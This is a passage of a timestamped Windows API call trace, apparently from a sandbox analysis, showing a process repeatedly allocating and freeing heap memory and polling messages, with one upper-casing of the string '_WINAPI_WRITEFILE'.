HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.812] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0173.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0173.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.816] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0173.816] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0173.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0173.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0173.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0173.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0173.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0173.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0173.818] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0173.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0173.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0173.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0173.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 